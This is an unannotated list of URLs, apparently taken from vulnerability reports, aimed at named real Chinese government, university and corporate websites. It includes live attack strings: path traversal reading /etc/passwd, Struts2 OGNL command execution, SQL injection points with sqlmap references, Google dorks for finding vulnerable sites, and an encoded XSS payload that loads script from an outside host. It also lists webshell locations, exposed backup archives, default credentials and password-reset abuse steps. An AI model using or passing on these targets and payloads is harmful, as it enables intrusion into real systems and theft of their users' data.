http://item.tourzj.gov.cn/invest/login.aspx http://item.tourzj.gov.cn/touristSites/login.aspx http://stat.tourzj.gov.cn/login.aspx http://item.tourzj.gov.cn/GeneralSubject/Login.aspx http://item.tourzj.gov.cn/leader/leaderadmin/login.aspx http://item.tourzj.gov.cn/projectitem/Travel/Travel/TravelLogin.aspx http://item.tourzj.gov.cn/projectitem/Travel/Tourism/TourismLogin.aspx http://item.tourzj.gov.cn/hotel/admin/adminlogin.aspx http://item.tourzj.gov.cn/projectitem/InfoReport/Default.aspx http://news.tourzj.gov.cn/admin/login.aspx http://cop.chanjet.com/home/verify.do?method=gotoStep2&username=[用户名 
http://blog.guosen.com.cn/usercenter/infoCenter/pwdChange.jsf?AJAXREQUEST=j_id_jsp_547915581_0&formId=formId&formId%3Auname=testxsstest1%40126.com&formId%3AoldPwd=12341234&formId%3AnewPwd=qwerqwer&formId%3AconfirmPwd=qwerqwer&javax.faces.ViewState=j_id2&formId%3Asave_btn=formId%3Asave_btn& http://blog.guosen.com.cn/usercenter http://blog.guosen.com.cn/usercenter/infoCenter/customiseSetting.jsf http://blog.guosen.com.cn/usercenter/infoCenter/customiseSetting.jsf?AJAXREQUEST=j_id_jsp_1760869216_0&form_id=form_id&form_id%3Aj_id_jsp_1760869216_5=&form_id%3AavatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3AdefaultAvatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3Afour=0&form_id%3Ay=0&form_id%3Aj_id_jsp_1760869216_10=&javax.faces.ViewState=j_id1&form_id%3Aj_id_jsp_1760869216_2=form_id%3Aj_id_jsp_1760869216_2& http://blog.guosen.com.cn/usercenter/infoCenter/customiseSetting.jsf?AJAXREQUEST=j_id_jsp_1760869216_0&form_id=form_id&form_id%3Aj_id_jsp_1760869216_5=&form_id%3AavatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3AdefaultAvatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3Afour=0&form_id%3Ay=0&form_id%3Aj_id_jsp_1760869216_10=&javax.faces.ViewState=j_id1&form_id%3Aj_id_jsp_1760869216_3=form_id%3Aj_id_jsp_1760869216_3& http://blog.guosen.com.cn/usercenter/infoCenter/customiseSetting.jsf?AJAXREQUEST=j_id_jsp_1760869216_0&form_id=form_id&form_id%3Aj_id_jsp_1760869216_5=&form_id%3AavatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3AdefaultAvatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3Afour=0&form_id%3Ay=0&form_id%3Aj_id_jsp_1760869216_10=&javax.faces.ViewState=j_id1&form_id%3Aj_id_jsp_1760869216_4=form_id%3Aj_id_jsp_1760869216_4& 
http://blog.guosen.com.cn/usercenter/infoCenter/customiseSetting.jsf?AJAXREQUEST=j_id_jsp_1760869216_0&form_id=form_id&form_id%3Aj_id_jsp_1760869216_5=&form_id%3AavatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3AdefaultAvatarHid=http%3A%2F%2Fblog.guosen.com.cn%2Fcgui%2Fimages%2Fdefault.jpg&form_id%3Afour=0&form_id%3Ay=0&form_id%3Aj_id_jsp_1760869216_10=&javax.faces.ViewState=j_id1&form_id%3Aj_id_jsp_1760869216_38=form_id%3Aj_id_jsp_1760869216_38& http://blog.guosen.com.cn/usercenter/infoCenter/pwdChange.jsf http://blog.guosen.com.cn/usercenter/infoCenter/pwdChange.jsf?AJAXREQUEST=j_id_jsp_547915581_0&formId=formId&formId%3Auname=testxsstest%40126.com&formId%3AoldPwd=12341234&formId%3AnewPwd=qwerqwer&formId%3AconfirmPwd=qwerqwer&javax.faces.ViewState=j_id3&formId%3Asave_btn=formId%3Asave_btn& https://blog.guosen.com.cn/sso/login?service=http%3A%2F%2Fwww.baidu.com http://www.cmpedu.com/article/newsarticle!webarticle.do?channel_id=%279053&article_id=2003762 http://sdk.chinacache.com http://sdk.chinacache.com/login?_method=checkUsername&username=存在的一个用名 http://gs.xjtu.edu.cn/zhaos/data/upload/fujian/35994.sql http://www.joyoung.com.cn/WEB-INF/该目录下所有文件可以直接读取。 http://research.iflytek.com/wp-content/themes/twentyeleven/2013.php http://joyoung.cnstaff.com/ http://zj.zjfzb.gov.cn:9999/zfjdpt/userLogin-login.action http://eholiday.ceair.com URL:http://eholiday.ceair.com//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd URL:http://eholiday.ceair.com//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/group URL:http://eholiday.ceair.com//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/services http://hope.7k7k.com/login.html 
http://hope.7k7k.com/login.html?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29 http://wy.nenu.edu.cn/news/news.php?id=343 inurl:down.asp?FileName http://www.mg12333.gov.cn/down.asp?FileName=../conn.asp http://www.jxrsrc.gov.cn/down.asp?FileName=../conn.asp http://www.nxjy.net/down.asp?FileName=../conn.asp http://lxxy.cjlu.edu.cn/down.asp?FileName=../conn.asp http://gh.cjlu.edu.cn/down.asp?FileName=../conn.asp http://www.china-ta.org/web/mod/review.php?id=2 https://github.com/quake/quake.github.com/blob/master/slides/huohua/index.html http://cyjs.qiniudn.com/pois/58-78.zip(qiniudn是chanyouji的图片存储主机) http://blog.renren.com/share/366549583/10752078940 http://haolaiwu.coocaa.com/self/city.php?id= http://haolaiwu.coocaa.com/self/distinct.php?id= http://221.0.95.10:81/YANTAI/systemsetting/userLogin.action http://221.0.95.10:81/ttt/exportdata.txt http://221.0.95.10:81/ttt/exportdata1.txt http://221.0.95.10:81/ttt/exportdata2.txt http://221.0.95.10:81/ttt/exportdata9.txt http://221.0.95.10:81/ttt/xiaoye.jsp http://221.0.95.10:81/ttt/strt.jsp http://house.focus.cn/housemarket/school_arround.php?t=school_line&school_line=3 http://218.22.201.156/ http://www.xfuedu.org/xyhq/readnews.asp?id=102 http://cn.chinacache.com/cdn/admin.php?field=meeting_name&keyword=-1&province=NY&refer=0 http://202.195.176.29/pyxx/login.aspx 
http://jwcweb.lnpu.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1321 http://www.cnhww.com/softdown.asp?id=1 http://www.cnhww.com/softdown.asp?id=6 http://www.cnhww.com/softdown.asp?id=2 http://www.cnhww.com/DownLoad.asp http://ued.sogou.com/wp-content/uploads/ http://pan.baidu.com/s/1c0gVKCK http://68cn.dooland.com/order_submit.php http://68cn.dooland.com/forgetpass.php http://ahvnet.dooland.com/oldmag.php?id=7950 http://ahvnet.dooland.com/subscription.php?id=1111 http://ahvnet.dooland.com/oldmag.php?p=2&id=7950 http://ahvnet.dooland.com/forgetpass.php http://ahvnet.dooland.com/order_submit.php http://sq.169ol.com/dianping/ajax.php?action=usereffect&effect=effect2&effectaction=getusers&idtype=shop&keyid=asdf http://sq.169ol.com/dianping/shop/search.php http://sq.169ol.com/phpmyadmin/ http://www.hnkj.com.cn/ inurl:newinfo.do?infoId http://www.***.gov.cn/vote/voteok2.jsp?researchId=2 http://www.a***w.gov.cn/vote/voteok2.jsp?researchId=3 http://www.***y.gov.cn/vote/voteok2.jsp?researchId=2 http://www.a***.org.cn/vote/voteok2.jsp?researchId=3 http://www.***.ah.cn/vote/voteok2.jsp?researchId=3 http://player.lstat.youku.com/config.php.bak http://uapma.yonyou.com:8060/ump/umpserver/www/login.jsp http://bbs.xunlei.com/ webshell:http://bbs.xunlei.com/config/config_ucenter.php http://businessinfo.co.uk/labs/xss/xss.swf[/flash http://businessinfo.co.uk/labs/xss/xss.swf http://businessinfo.co.uk/labs/xss/xss.swf height:100% http://www.adobe.com/go/getflash http://businessinfo.co.uk/labs/xss/xss.swf"asd http://businessinfo.co.uk/labs/xss/xss.swf"asd http://businessinfo.co.uk/labs/xss/xss.swf[/flash http://www.xxx.com/xss.swf http://idc.btwob.net/data.rar http://idc.btwob.net/333.rar http://idc.btwob.net/wwwroot.rar http://www.jixiang2003.com/wwwroot.rar www.jixiang2003.com的源码 http://www.ymdj.com.cn/ckeditor/_samples/replacebyclass.html http://zwxx.zjjyedu.org/User/manageinfos.aspx user:zdsoft pass:zdsoft 
http://ifts.zju.edu.cn/iftsnew/index.php?CONTENT=News&LANG=CN&action=full&page=1&id=178 www.strongsoft.net http://219.159.239.96:8088/ http://219.159.102.99:8088/为例。 http://shzh.wlfx.gov.cn/Plan/FloodPlan/FloodPlanList.aspx?readOnly=&adcd=331081001003000&filetype=156&r0.26239625721837556 http://jiwei.hebau.edu.cn/list.php?cid=5 http://www.polytheatresz.com/ http://www.polytheatresz.com/ http://www.fcchbj.com/ http://www.polytheatre.com/ http://www.dgyldjy.com/ http://www.polytheatre.com/页面最右侧有一个列表 www.ahqi.gov.cn http://www.ahqi.gov.cn:9090/console/flexbin/Main.html http://61.190.8.226:8383/ inurl:/gmis/xjgl/ http://order.gmacsaic.net/使用万能账号 http://order.gmacsaic http://order.gmacsaic http://www.eeagd.edu.cn/xyspbm/login.do http://203.208.46.145/#newwindow=1&q=inurl:web!getItem.action http://www.westarsoft.com/ http://t.ztbest.com http://t.ztbest.com/upfile/headphoto/635375688922623383.jpg/1.php http://www.tech.net.cn/web/zy_list/articleview.aspx?id=2181 http://211.156.220.102/cnpl/portal https://passport.m.jd.com/user/balance.action?sid=6880ccf8686766051c694c644297115e http://localhost/cmseasy5.5/index.php?case=union&act=register http://www.jixiang2003.net/wwwroot.rar inurl:/webhouse/query/index.aspx,搜到的都是可以利用的,得有几十家了 http://202.195.176.29/gmis/tzgg/TZGGdetail.aspx?id=182 http://59.67.75.234/Gmis/tzgg/TZGGdetail.aspx?id=182 http://202.203.225.17:8080/Gmis/tzgg/TZGGdetail.aspx?id=182 http://210.33.16.51/gmis/tzgg/TZGGdetail.aspx?id=182 http://yjs.xzmc.edu.cn:8080/gmis/tzgg/TZGGdetail.aspx?id=182 http://www.t3.com.cn/sina/src_uuid/此处填微博uid http://www.t3.com.cn/sina/src_uuid/2067274670 inurl:/website/dflz/ http://59.34.3.90/website/approve/approveSiteAction!showChartDept.action?deptcode=1&deptname=null&voteid=134 http://59.34.3.90/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=%BD%CC%D3%FD&style=4&subType=83 
http://59.34.3.90/website/approve/approveSiteAction!listNews.action?issueTypeCode=1&issueTypename=????????&style=7 http://59.34.3.90/website/approve/approveSiteAction!listApproveModel.action?action=search&department=1&forward=searchmodel&style=4 https://x.x.x.x/jddba/login/check.action https://x.x.x.x/jddba/login/check.action?redirect:$ http://developer.meizu.com/common/upload http://www.cofcorice.com/admin http://zheye.cc/index.php/Home/Index/attention_ajax?aid=1388&action=add http://zheye.cc/index.php/Home/Index/attention_ajax?aid=1388fdkjfkd&action=add http://yulujihua.tudou.com/yulujihua/comment.do?method=queryJSON&parentId=1&qstatus=1&type=2 http://lidushen.tudou.com/lidushen/admin/ http://philipshaircare.tudou.com/philipshaircare/comment.do?method=queryJSON&parentId=1&qstatus=1&type=2 http://philipshaircare.tudou.com/philipshaircare/comment.do?method=queryJSON&qstatus=1&type=1 http://www.xiu8.com/family_home?family_id=11090 http://find.yyemebed.yy.com:80/ http://find.yyemebed.yy.com:80/auth/index/处就进行uid的欺骗。事实证明那块技术哥哥忘记加验证了。而是在最后一步加了验证,补尾不补头的做法,实在难以恭维啊! 
http://login.alibaba-inc.com准备导入证书信息 http://zf.gpc.net.cn/ http://203.208.46.145/#filter=0&newwindow=1&q=inurl:ApproveSiteAction!findApproveGuide.action http://www.syzwfw.gov.cn/website/approve/approveSiteAction!issueListShow.action?issueTypeCode=000061&issueTypename=%B1%E3%C3%F1%B7%FE%CE%F1&specialProperty=3 http://zqas.gov.cn/website/approve/approveSiteAction!issueListShow.action?issueTypeCode=000002&issueTypename=%B1%E3%C3%F1%B7%FE%CE%F1&specialProperty=3 http://www.renhua.gov.cn/website/approve/approveSiteAction!issueListShow.action?issueTypeCode=000002&issueTypename=%B1%E3%C3%F1%B7%FE%CE%F1&specialProperty=3 http://www.syzwfw.gov.cn/website/approve/approveSiteAction!listNews.action?issueTypeCode=X_JCDT&issueTypename=%BC%E0%B2%EC%B6%AF%CC%AC&style=6 http://www.flymeal.cn/customerajax/changeaddress!delAddress.action http://www.hngl.hunan.gov.cn http://www.hngl.hunan.gov.cn/Common/UpLoadFile.aspx http://www.hngl.hunan.gov.cn/201406/20140605192048564696.aspx http://202.192.240.9/fao/dede/ URL:http://chaxin.lib.tsinghua.edu.cn/Novelty_Search/CheckNewTrack.aspx http://pan.baidu.com/s/1kT0utz5 http://prm.chanjet.com/ajax/oneuserlogin.php?name=1111【注入点】 http://prm.chanjet.com/login/forgetpswd.php?loginsys=3&orgcode=111&loginname=1111【注入点】 http://ezeip.gzwhir.com/index.aspx http://clientdispatch.10086.cn:8080/downfile/apk/CM10086_android_V1.9.0_0515.apk inurl:/page/contact/contact.php http://www.shyhsm.com/search/index.php?key=1 http://dormahk.com/search/index.php?key=1 http://www.sqlmap.org http://222.32.90.7:8080/ inurl:product/class/index.php?showtag= http://www.xxx.net/product/class/index.php?showtag=1 http://www.wjj.cc/product/class/index.php?showtag=%E5%88%86%E9%85%8D%E9 http://www.sqlmap.org www.wjj.cc\session inurl:/down/class/index.php?page=1 http://www.0734pc.cn/down/class/index.php?showtj=1 http://www.sqlmap.org www.0734pc.cn\session inurl:news/class/index.php?page=1 http://www.hope-med.com.cn//news/class/index.php?showtj=1 
http://www.hope-med.com.cn//news/class/index.php?showtj=1 http://www.sqlmap.org www.hope-med.com.cn\session http://www.nanzheng.gov.cn/texteditor/include/upload.aspx http://www.nanzheng.gov.cn/texteditor/include/upload.aspx?type=File inurl:prDownLoad www.zfxxgk.bjshy.gov.cn:8090 http://vip.stock.finance.sina.com.cn/q/go.php/vIR_CustomSearch/index.phtml?sr_p=60&sprice=5&market=sz&order=avg_incpercent%7C2&p=1 http://203.208.46.145/#filter=0&newwindow=1&q=inurl:content/FileDown.jsp%3FSPATTINDEX http://gzgl.etec.edu.cn/uids/login!login.action http://cop.chanjet.com/home/verify.do?method=gotoStep3Mobile&username=(要重置的用户帐号) http://cop.chanjet.com/home/verify.do?method=gotoStep3Mobile&username=18910888726 http://cop.chanjet.com/home/verify.do?method=gotoStep3Mobile&username=18910888719 inurl:showPubList http://www.igeek.com.cn/uc_server/admin.php http://demo.a3cn.com/cpa3/index.asp http://serviceshop.lenovo.com.cn/pay inurl:/photo/class/index.php?showtj= http://www.xinwangtian.com//photo/class/index.php?showtj=1 http://www.xinwangtian.com//job/class/index.php?showtj=1 http://www.xinwangtian.com//photo/class/index.php?showtj=1 http://www.sqlmap.org www.xinwangtian.com\session http://zbird.tudou.com/zbird/script.do?method=queryList&orderBy=createTime&page=1&size=12&sort=&status=1 http://zbird.tudou.com/zbird/system/login.jsp www.sutrip.com内部管理网站时需要登陆用户名,但是,进入储存同行信息网页时无需用户名密码。 http://bbs.letv.com/uc_server/admin.php?m=user&a=login&iframe= http://ugc.moji001.com/sns/PersonalMessageList?UserID=1000000000&Version=10033002&SnsID=151&Step=20&KindID=3 http://hssra2.jlu.edu.cn/new/joyphppicnew/show.php?newarticleid=708 http://hssra2.jlu.edu.cn/new/joyphppicnew/list.php?newblockid=1 http://crms.xacin.com.cn/login!register.do http://dce.jlu.edu.cn/newindex/intro.php?id=46 http://m.analytics.126.net/OuterData/login.action http://xx/wingsoft/common/cwWsData.jsp?funcno=a example:http://jcc.ynnu.edu.cn//wingsoft/common/cwWsData.jsp?funcno=a 
http://cwcx.njmu.edu.cn/WFManager/loginAction_getCheckCodeImg.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.fangxinbao.com/question/137.html http://www.fangxinbao.com/question/321.html http://www.fangxinbao.com/product-ask/239.html http://wooyun.org/bugs/wooyun-2014-059437 com:wooyun oa:http://oa.chanjet.com/ http://x55.me/cmseasy.php?xss=test ip:221.226.48.130 http://zc.cjrc.com.cn/modules/universe/ArticleDetail.aspx?id=13 http://xxx.xxx/xss.swf loader:URLLoader https://kyfw.12306.cn inurl:/OnlineQuery/QueryDetail.aspx http://shenpi.yuzhou.gov.cn/OnlineQuery/QueryDetail.aspx?QueryId=487 http://www.sqlmap.org http://xiage.yy.com/thread-84277-1-1.html http://xiage.yy.com/ http://open.pcpop.com/Ajax_EbWorthBuyingProdu http://sqlmap.org http://mgr.yaofang.cn/login http://dealer.yaofang.cn/ http://zone.wooyun.org/content/12400 http://www.chinavvv.com/ inurl:/dwld/dwld.jsp http://shenpi.hengyang.gov.cn/langchao.ecgap.outportal/OnlineQuery/Quer http://www.sqlmap.org http://sfj.yueyang.gov.cn/open.php?typeid=1 http://sfj.yueyang.gov.cn/open.php?id=8439&t=new.html http://sfj.yueyang.gov.cn/open.php?id=81%7Copen.php?id=80%7Copen.php?id=79%7Copen.php?id=78%7Copen.php?id=77%7Copen.php?id=76 http://zszc.yangtzeu.edu.cn/admin/Login.aspx http://zszc.yangtzeu.edu.cn/admin http://jxjy.yangtzeu.edu.cn/onews.asp?id=1434 http://jxjy.yangtzeu.edu.cn/hsb/gbook/guestbook.asp?user=jxjyxy http://jxjy.yangtzeu.edu.cn/hsb/gbook/guestbook.asp?user=jxjyxy http://admission.whu.edu.cn/Whyus.aspx?i=1842&s=aboutus http://admission.whu.edu.cn/Notices.aspx?c2=177&s=Notice 
http://admission.whu.edu.cn/Admission.aspx?i=1954 http://admission.whu.edu.cn/Info.aspx?i=1892&s=Accommodation http://admission.whu.edu.cn/StuServers.aspxi=1898&s=StudentService http://admission.whu.edu.cn/NoticeView.aspx?i=2084 http://admission.whu.edu.cn/StuServers.aspx?s=StudentService&i=2079 http://admission.whu.edu.cn/Notices.aspx?c2=177 http://admission.whu.edu.cn/Info.aspx?i=1853 http://admission.whu.edu.cn/Courses.aspx?&skyy=English http://admission.whu.edu.cn/Whyus.aspx?i=1842 http://admission.whu.edu.cn/Contact.aspx?c=166 http://82554251.home.news.cn/portal/ http://media.whu.edu.cn/more.asp?classid=2 http://media.whu.edu.cn/Expertdetail.asp?id=1 http://media.whu.edu.cn/Search.asp http://journal.whu.edu.cn/oldsite/academia/read_academia.php?id=1589 http://journal.whu.edu.cn/oldsite/news/read_news.php?id=1452 http://www.phpoa.cn/下载一份 http://192.168.1.114/install/install.php http://192.168.1.114/admin.php?ac=user&fileurl=mana&do=add http://oa.polyfilm.net:7001/defaultroot/govezoffice/custom_documentmanager/smartUpload.jsp?path=innerMailbox&fileName=innerMailFileName&saveName=innerMailSaveName&tableName=innerMaildisplaytable&fileMaxSize=0&fileMaxNum=0&fileType=&fileMinHeight=0&fileMinWidth=0&fileMaxHeight=0&fileMaxWidth=0 http://hljxwjtheb.vicp.cc:7001/defaultroot/custom_form/smartUpload.jsp?path=innerMailbox&fileName=innerMailFileName&saveName=innerMailSaveName&tableName=innerMaildisplaytable&fileMaxSize=0&fileMaxNum=0&fileType=&fileMinHeight=0&fileMinWidth=0&fileMaxHeight=0&fileMaxWidth=0 http://irridrain.whu.edu.cn/news/class/index.php?key=88952634&myord=uptime&myshownums=10 http://irridrain.whu.edu.cn/news/class/index.php?key=88952634&myord=uptime&myshownums=10 http://www.xsjy.whu.edu.cn/jiuyexinxi/list.php?order=meettime http://ygxy.rsgis.whu.edu.cn/admin/column_menu_del.php?id= http://xyy.jlu.edu.cn/yygk.php?id=562 http://xyy.jlu.edu.cn/dwgz.php?id=334 http://xyy.jlu.edu.cn/dw.php?id=442 http://xyy.jlu.edu.cn/gh.php?bid=177 
http://xyy.jlu.edu.cn/bjgl.php?id=287 http://xyy.jlu.edu.cn/jkjywz.php?id=745 http://xyy.jlu.edu.cn/jbkz.php?bid=220 http://xyy.jlu.edu.cn/ylgl.php?id=564 http://xyy.jlu.edu.cn/ybgl.php?id=584 http://xyy.jlu.edu.cn/hlgl.php?id=341 http://xyy.jlu.edu.cn/hl_jj.php?id=540 http://xyy.jlu.edu.cn/hl_dt.php?bid=232 http://xyy.jlu.edu.cn/hl_gjt.php?id=525 http://xyy.jlu.edu.cn/yxgl.php?id=405 http://xyy.jlu.edu.cn/ypglwz.php?id=438 http://xyy.jlu.edu.cn/qxglwz.php?id=743 http://www.xxx.com/okyy123551/login.php http://www.iapppay.com/ http://ipay.iapppay.com:8888/images/paywss/regimg/300990/register1402111322737.jsp;菜刀连接 http://www.szwzfy.gov.cn/fglt_show.php?id=37 http://lu.sogou.com/ads?sohuurl=&kwd=1&w=cGlkPXNvZ291X3dlYnRvbmdmYXdlbnomZm10PWFkcyZzcT0iO2RvY3VtZW50LndyaXRlKCc8c2NyaXB0L3NyYz0vL3hzcy5wdy9qPicpOy8v url:http://cq.qq.com/house/2222.htm json:http://ud.cq.qq.com/api/activity/6968/result/js?pagesize=200 http://open.letvstore.com/.svn/entries http://open.letvstore.com http://cron.api.letvstore.com/file-center/app/2014/06/07/c6f3b5d5-afbf-4a18-bef9-3e1f9dc48dcd.html http://icare.qq.com/ http://oa.zto.cn/seeyon/ http://zs.njupt.edu.cn/html/Index/article/id/356 http://zs.njupt.edu.cn/html/Index/article/id/* http://jingyan.baidu.com/article/db55b609adc61d4ba30a2f88.html http://hljxwjtheb.vicp.cc:7001/defaultroot/public/jsp/livephotoupload2.jsp?path=peopleinfo&visualName=empLivingPhotoTemp&hiddenName=empLivingPhoto&del=yes http://hljxwjtheb.vicp.cc:7001/defaultroot/public/jsp/livephotoupload.jsp?path=desktop&mode=add&hiddenName=unitImgSaveName&visualName=unitImgName http://www.baidu.com/s?cl=3&wd=Wanhu+ezOFFICE http://74.125.227.77/#newwindow=1&q=Wanhu+ezOFFICE&start=20 www.scfda.gov.cn/message/messageManager/messageslist.jsp?fieldName=&curPage=&query=12&goInt=1 http://www.cmd5.com/ http://jc.scfda.gov.cn/index.do http://oa.scfda.gov.cn/logoff.do?formAction=logoff http://222.197.192.122/seeyon/main.do 
http://6678.online.tj.cn/go.asp?url=http://www.sina.com.cn&id=23100&up_kind= http://www.sina.com.cn http://6678.online.tj.cn/go.asp?url=http://www.sina.com.cn&id=23100&up_kind= http://6678.online.tj.cn/go.asp?url=http://www.sina.com.cn&id=23100&up_kind= https://user.iapppay.com:8083/userservice/u/login.do http://ltxc.jlu.edu.cn/Art_Show.php?id=63 http://jdyxb.jlu.edu.cn/news.php?bid=1 http://jdyxb.jlu.edu.cn/newslist.php?bid=210 http://jdyxb.jlu.edu.cn/hzjl.php?bid=208 http://jdyxb.jlu.edu.cn/newsshow.php?id=1968 http://jdyxb.jlu.edu.cn/xinwen.php?bid=3 http://lsjyw.lnnu.edu.cn/detail.asp?id=6022 http://jwc.jlu.edu.cn/?file=info&act=view&id=1 http://epaper.jlu.edu.cn:81/remark.php?doc_id=8640 http://xiaobao.jlu.edu.cn/newindex/newspic.php?qishu=369 http://ccpser.jlu.edu.cn/luntsee.php?id=1733 http://apps.jlu.edu.cn:808/jwk-xk/cx/kbcx/stuQueryMain.jsp http://juccc.jlu.edu.cn/otherpublications_edit0.php?id=8 http://ygdg.dg.gov.cn/ http://kjy.jlu.edu.cn/?file=info&act=view&id=335 http://xchb.jlu.edu.cn/lanmu.php?fid=1 http://xchb.jlu.edu.cn/lanmu.php?fid=7&&article=3077 http://xchb.jlu.edu.cn/lanmu.php?fid=7&&article=3077 http://mpa.jlu.edu.cn/inc/annexdata.php?id=300 http://geo.jlu.edu.cn/lab/class.php?classid=1&Nclassid=3 http://119.jlu.edu.cn/show.php?id=681 http://119.jlu.edu.cn/navxfcs.php?page=1&id=9 http://119.jlu.edu.cn/navxfys.php?page=1&id=10 http://gjc.jlu.edu.cn/oic/hwzj/gjhy_content.php?type=4 http://gjc.jlu.edu.cn/oic/lxjd/lxjd_xm_detail.php?data1_num=19 http://gjc.jlu.edu.cn/oic/cgcj/cgxz.php?module=8&link_type=1 http://gjc.jlu.edu.cn/oic/cgcj/cgxz.php?module=8&link_type=1 www.qyx.gov.cn http://swzx.jlu.edu.cn/swsysfzx/cx_list/index.php?id=9d907e2a-4b3c-11e3-9201-dc0ea182a1ef&info_id=26108e63-4c04-11e3-8a3d-dc0ea182a1ef&context_id=c140dd66-dfe2-11e3-8782-000795185730 http://swzx.jlu.edu.cn/swsysfzx/cx_list/index.php?id=9d907e2a-4b3c-11e3-9201-dc0ea182a1ef&info_id=26108e63-4c04-11e3-8a3d-dc0ea182a1ef&context_id=c140dd66-dfe2-11e3-8782-000795185730 
http://swzx.jlu.edu.cn/innovation/news/news_con.php?id=f6c5b1a0-ba33-11e3-835c-6cae8b20789d http://swzx.jlu.edu.cn/swsysfzx/shizi/t_info.php?id=9ec4e51e-6f93-11e3-9541-80a1a556c2c8 http://swzx.jlu.edu.cn/swsysfzx/cx_list/cx_content.php?id=a3be5d16-4b3c-11e3-9201-dc0ea182a1ef&context_id=9f6d1f8a-b3e7-11e3-bfc1-b6a0001c8e77 http://swzx.jlu.edu.cn/swsysfzx/cx_list/cx_content.php?id=a3be5d16-4b3c-11e3-9201-dc0ea182a1ef&context_id=9f6d1f8a-b3e7-11e3-bfc1-b6a0001c8e77 http://www.baidu.com/s?wd=powerd%20by%20BEESCMS http://www.beescms.com/ http://www.beescms.com/demo/ http://beescmsus.us207.eoidc.net/admin/login.php http://cp.dns-china.com/vpsadm/,在vps管理页面可以获取到控制面板的登录密码。控制面板的登录名为vps+ip后六位,例如ip为XXX.XX1.23.234的登录名为vps123234。 http://sys.59.cn/System/ajax.asp?act=getvpspass,如果成功会刷新vps管理页面的登录密码。 http://www.iaps.sdu.edu.cn/ http://www.choumei.cn/admin.php http://dmbz.juneyaoair.com:88/login.jsp http://www.360eol.com/eol/quanguo/newsForNew/index_frame.jsp?randomId=7F121A51-A316-9D51-E039-559000FCBBFA http://exam.netentsec.com/ http://www.ahzsks.cn/Ordinary5/article.jsp?articleId=44563738 http://smlt.tl.gov.cn/inter/live_detail.php?id=597277 http://old.cdbs.com.cn/g/show.asp?site=cdbs&channel=news&category=article&type=column590x150&location=1 cn:8050/index.php?mid=4 http://www.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query= http://chjw.njau.edu.cn/showinfo.asp?id=728 http://wxy.ahu.edu.cn/djgz_show.asp?id=359 http://wxy.ahu.edu.cn/admin/ http://house.focus.cn/community/cqxuefuyaohao/khlist.php?id=1 http://demo.1hai.cn/ http://demo.1hai.cn/ChargeAccount/ http://demo.1hai.cn/SSOLogin/ http://demo.1hai.cn/vendor/maintain/ http://demo.1hai.cn/qx/ http://demo.1hai.cn/bd/login.aspx?returl=default.aspx http://demo.1hai.cn/SalesWeb/ http://demo.1hai.cn/m/chauffeur/selfdriver.aspx?__ufps=937141 http://demo.1hai.cn/interface/MessgerCenter/Admin/Img/SmsNet4C.png http://180.169.55.154:88/ http://180.169.55.154:88/Administration/DepartmentDetail.aspx?DEP_ID=18 
